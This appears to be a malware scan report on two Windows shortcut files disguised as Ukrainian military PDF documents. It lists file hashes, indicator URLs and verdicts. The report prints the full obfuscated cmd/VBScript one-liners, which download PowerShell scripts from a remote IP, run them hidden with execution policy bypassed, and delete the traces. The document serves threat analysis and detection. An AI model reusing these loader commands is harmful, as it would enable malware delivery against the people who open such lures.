| Hash | Hash Value |
|---|---|
| MD5 | 87c1badcfd555bca1b5fe13ed212d1b2 |
| SHA1 | c9b580d9811f2df1c70edc25825319d2eb29d392 |
| SHA256 | 90984d6788417bc284b17c3b302c1b667acfbf881eee0afeea1141b30f7379e1 |
| SHA384 | 907b70c12f49eb28d87c67c4c24ecaba564788955ba9838c0523f6405d7b650e6221a867ba9d11b48a7cc8eb5835d07c |
| SHA512 | fa40e257d5a119c76723e6c2923d9b3b827cd334f2b0c10580764d012537314bd051fc190b2a8c85dfc7de263515cd63f51499f1bebcdfc5ceb808a0f7683a9e |
| SSDeep | 48:ABx3NGkTvdqTel+tk051WUyauR6qxXY67QqTel+tsd51WU4csoqJ/iWEB/iIc1f:ABxZTSel+t1nJuXV77el+tGnFtjoIAf |
| TLSH | 95C2E28173F81304F5B6FE36DE39AB45483ABA90ED31C7AC5950CC1D2A66A00EA75F35 |
| Name | Value | Verdict | Location |
|---|---|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://2.26.74.115/v1sl4g488/aspiringpayoff.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\NIwSHc.ps1",2 > %TEMP%\Rje.vbs && cscript //b %TEMP%\Rje.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\NIwSHc.ps1 && del %TEMP%\Rje.vbs %TEMP%\NIwSHc.ps1" | Malicious | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk |
| URLs in VB Code - #1 | http://2.26.74.115/v1sl4g488/aspiringpayoff.ps1 | | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\Rje.vbs" "%TEMP%\NIwSHc.ps1 IconLocation: imageres.dll" | Malicious | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\Rje.vbs" "%TEMP%\NIwSHc.ps1" | Malicious | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk > LNK CommandLine > [PowerShell Command] |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://2.26.74.115/v1sl4g488/heartwoodtension.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\0Y3F.ps1",2 > %TEMP%\NDh.vbs && cscript //b %TEMP%\NDh.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\0Y3F.ps1 && del %TEMP%\NDh.vbs %TEMP%\0Y3F.ps1" | Malicious | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk |
| URLs in VB Code - #1 | http://2.26.74.115/v1sl4g488/heartwoodtension.ps1 | | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\NDh.vbs" "%TEMP%\0Y3F.ps1 IconLocation: imageres.dll" | Malicious | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\NDh.vbs" "%TEMP%\0Y3F.ps1" | Malicious | 87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk > LNK CommandLine > [PowerShell Command] |